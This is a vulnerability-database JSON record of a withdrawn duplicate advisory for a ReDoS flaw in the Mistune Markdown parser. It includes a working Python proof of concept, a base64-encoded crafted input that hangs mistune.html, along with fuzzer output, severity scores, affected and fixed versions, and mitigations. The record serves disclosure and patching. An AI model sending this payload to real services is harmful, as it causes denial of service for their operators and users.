{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/347223?format=json","vulnerability_id":"VCID-sh4a-8vh7-ayb4","summary":"Duplicate Advisory: Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references.\n\n### Original Description\n\n### Summary\n**Denial-of-Service (DoS)** vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs.\n\n**Function affected:** parse_link_title() in helpers.py\n**Issue:** Malformed reference links cause excessive backtracking and parsing loops.\n**Impact:** Remote attackers can submit malicious Markdown to hang processes, causing service unavailability.\n\n### Details\n```\nName: mistune\nVersion: 3.2.0\nPython version: Python 3.13.9\nPIP version: pip 25.2\nOS: Kali-linux-VERSION=\"2025.4\"\n```\n\n### PoC\n```\nimport mistune\nimport base64\n\nprint(\"Exploit started....!\")\ndata = base64.b64decode(\n    \"WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg==\"\n)\nmistune.html(data.decode(\"utf-8\", errors=\"ignore\"))\n```\n\n### Reproduce steps:\nSimply execute above python script it will hang & increase cpu utilization to 100%\n\n**Fuzzer Output (libFuzzer):**\n```\nERROR: libFuzzer: timeout after 3 seconds\nSUMMARY: libFuzzer: timeout\n```\n\n**Stack Trace (Excerpt):**\n```\nmistune/helpers.py:170 in parse_link_title\nmistune/block_parser.py:259 in parse_ref_link\nmistune/core.py:216 in parse_method\nmistune/block_parser.py:458 in parse\nmistune/markdown.py:93 in parse\nmistune/markdown.py:120 in __call__\n```\n### IMAGE POC:\n<img width=\"1194\" height=\"728\" alt=\"POC\" src=\"https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077\" />\n\n\n### Impact:\nDenial-of-Service (DoS)\nHigh CPU usage and application hang\nPotential for service unavailability in web apps or APIs processing untrusted Markdown\n\n### Suggested Mitigations:\nImplement parsing depth and iteration limits.\nLimit reference-link title length.\nDetects excessive escape character sequences.\nAdd defensive checks in parse_link_title.\nAdd fuzz regression tests using the provided PoC.\n\nThis vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently.","aliases":[{"alias":"GHSA-hjph-f4mc-wx4c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49669?format=json","purl":"pkg:pypi/mistune@3.2.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.2.1"}],"affected_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49652?format=json","purl":"pkg:pypi/mistune@3.0.0a1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dtjf-n7mt-z3ba"},{"vulnerability":"VCID-q9br-dckr-gkd1"},{"vulnerability":"VCID-sh4a-8vh7-ayb4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.0.0a1"},{"url":"http://public2.vulnerablecode.io/api/packages/49668?format=json","purl":"pkg:pypi/mistune@3.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8tt4-rc9y-9qgc"},{"vulnerability":"VCID-atg4-cdz2-cfhe"},{"vulnerability":"VCID-dtjf-n7mt-z3ba"},{"vulnerability":"VCID-j8pk-v8t3-ybbu"},{"vulnerability":"VCID-jpzc-rd9c-vufu"},{"vulnerability":"VCID-q9br-dckr-gkd1"},{"vulnerability":"VCID-sh4a-8vh7-ayb4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.2.0"}],"references":[{"reference_url":"https://github.com/lepture/mistune","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/lepture/mistune"},{"reference_url":"https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c"},{"reference_url":"https://github.com/advisories/GHSA-hjph-f4mc-wx4c","reference_id":"GHSA-hjph-f4mc-wx4c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hjph-f4mc-wx4c"}],"weaknesses":[{"cwe_id":400,"name":"Uncontrolled Resource Consumption","description":"The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources."}],"exploits":[],"severity_range_score":"7.0 - 8.9","exploitability":"0.5","weighted_severity":"8.0","risk_score":4.0,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sh4a-8vh7-ayb4"}